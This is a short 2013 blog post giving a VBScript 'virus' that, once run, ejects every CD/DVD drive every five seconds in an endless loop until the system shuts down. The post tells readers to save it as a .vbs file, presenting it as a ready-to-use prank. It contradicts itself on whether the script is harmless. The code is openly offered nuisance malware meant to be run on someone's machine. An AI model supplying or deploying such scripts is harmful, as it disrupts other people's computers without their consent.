Sunday 1 December 2013

Making Pop-up CD/DvD Drive Virus

PoP-uP  CD/DvD  Dr!Ve  V!rUs
  • Effect –>  Low, but very irritating. Not Harmless.
  • Coding Platform –>  VBscript.
  • Working –>  On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.
**************************************************
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
************************************************************

No comments:

Post a Comment